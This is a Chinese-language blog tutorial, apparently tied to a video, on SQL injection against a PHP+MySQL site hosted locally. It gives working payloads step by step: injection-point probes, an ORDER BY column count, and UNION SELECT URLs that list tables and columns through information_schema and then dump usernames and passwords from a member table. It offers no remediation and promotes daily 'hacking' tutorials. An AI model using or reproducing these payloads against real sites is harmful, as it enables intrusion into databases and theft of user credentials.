實戰安全滲透SQL注入php+mysql網站入侵測試web教程

https://www.ixigua.com/i6808913583561245192/

大家好,今天給大家寫下如何滲透php+mysql網站,由於是測試我本地搭建了個網站

教程針對的是mysql5.0以上的版本!因為mysql5.0以上自帶的有information_schema數據庫,

information_schema:存儲mysql下所有信息的數據庫(數據庫名,表名,列名)。

用的工具是apmserv

實戰安全滲透SQL注入php+mysql網站入侵測試web教程

php函數:

database():數據庫名

user():數據庫用戶

version():數據庫版本

Mysql數據庫結構

數據庫A

  表名

    列名

      數據

數據庫B

  表名

    列名


      數據

一、判斷是否存在注入點

先用 ' 單引號來測試

實戰安全滲透SQL注入php+mysql網站入侵測試web教程

返回不正常,接著用and 來判斷

and 1=1 返回正常

實戰安全滲透SQL注入php+mysql網站入侵測試web教程

and 1=2

返回錯誤


實戰安全滲透SQL注入php+mysql網站入侵測試web教程

簡單兩步確認存在sql注入漏洞

二、order by

18正確

實戰安全滲透SQL注入php+mysql網站入侵測試web教程

19錯誤(說明存在18個字段)

實戰安全滲透SQL注入php+mysql網站入侵測試web教程

三、UNION SELECT 聯合查詢

http://192.168.1.30:88/article.php?id=-5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

爆出的數字是2.3。我們把需要查詢的函數寫入2或者3上面來查詢

實戰安全滲透SQL注入php+mysql網站入侵測試web教程

查詢數據庫名 用戶 數據庫版本,操作系統

實戰安全滲透SQL注入php+mysql網站入侵測試web教程

實戰安全滲透SQL注入php+mysql網站入侵測試web教程


四、爆數據庫下的所有表(數據庫名需要轉碼)

http://192.168.1.30:88/article.php?id=-5 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=0x6A69616E

實戰安全滲透SQL注入php+mysql網站入侵測試web教程

五、爆數據庫下表下的列

http://192.168.1.30:88/article.php?id=-5 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=0x6262736D656D626572


實戰安全滲透SQL注入php+mysql網站入侵測試web教程

六、爆列下的內容

http://192.168.1.30:88/article.php?id=-5 UNION SELECT 1,group_concat(username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from bbsmember


實戰安全滲透SQL注入php+mysql網站入侵測試web教程

賬號密碼都是admin

學習黑客技術的話 可以關注我,每天都會有相應的教程發佈的!!!

感謝大家的支持


分享到:


相關文章: